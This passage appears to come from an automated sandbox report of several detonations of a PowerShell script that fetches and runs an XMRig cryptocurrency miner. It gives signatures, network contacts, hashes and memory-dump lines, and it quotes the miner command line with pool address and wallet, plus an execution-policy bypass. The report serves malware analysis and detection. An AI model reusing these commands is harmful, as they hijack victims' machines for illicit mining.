memory/4584-144-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-145-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-146-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-147-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-148-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-149-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-150-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-151-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-152-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-153-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-154-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-155-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-156-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-157-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:41
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/3080-1-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-5-0x000001FAFA2C0000-0x000001FAFA2E2000-memory.dmp
memory/3080-8-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-9-0x000001FAFA470000-0x000001FAFA4E6000-memory.dmp
memory/3080-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zixbql3q.mdl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3080-25-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-48-0x000001FAFA920000-0x000001FAFA932000-memory.dmp
memory/3080-61-0x000001FAFA450000-0x000001FAFA45A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5100-90-0x000001EAAC240000-0x000001EAAC260000-memory.dmp
memory/5100-91-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-92-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/3080-93-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-94-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-95-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/5100-96-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-97-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-98-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-99-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-100-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-101-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-102-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-103-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-104-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-105-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-106-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-107-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-108-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-109-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-110-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-111-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-112-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-113-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-114-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-115-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-116-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-117-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-118-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-119-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-120-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-121-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-122-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-123-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-124-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-125-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-126-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-127-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-128-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-129-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-130-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-131-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-132-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-133-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-134-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-135-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-136-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-137-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-138-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-139-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-140-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-141-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-142-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-143-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-144-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-145-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-146-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-147-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-148-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-149-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-150-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-151-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-152-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-153-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-154-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-155-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-156-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/1448-3-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-5-0x000001677ECA0000-0x000001677ECC2000-memory.dmp
memory/1448-9-0x000001677EF90000-0x000001677F006000-memory.dmp
memory/1448-8-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcgrs5zg.wky.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-10-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-25-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-29-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-30-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-50-0x000001677EF70000-0x000001677EF82000-memory.dmp
memory/1448-63-0x000001677ECF0000-0x000001677ECFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3812-92-0x00000222A5CA0000-0x00000222A5CC0000-memory.dmp
memory/1448-93-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-94-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/3812-95-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-96-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-97-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-98-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-99-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-100-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-101-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-102-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-103-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-104-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-105-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-106-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-107-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-108-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-109-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-110-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-111-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-112-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-113-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-114-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-115-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-116-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-117-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-118-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-119-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-120-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-121-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-122-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-123-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-124-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-125-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-126-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-127-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-128-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-129-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-130-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-131-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-132-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-133-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-134-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-135-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-136-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-137-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-138-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-139-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-140-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-141-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-142-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-143-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-144-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-145-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-146-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-147-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-148-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-149-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-150-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-151-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-152-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-153-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-154-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-155-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-156-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-157-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:17
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
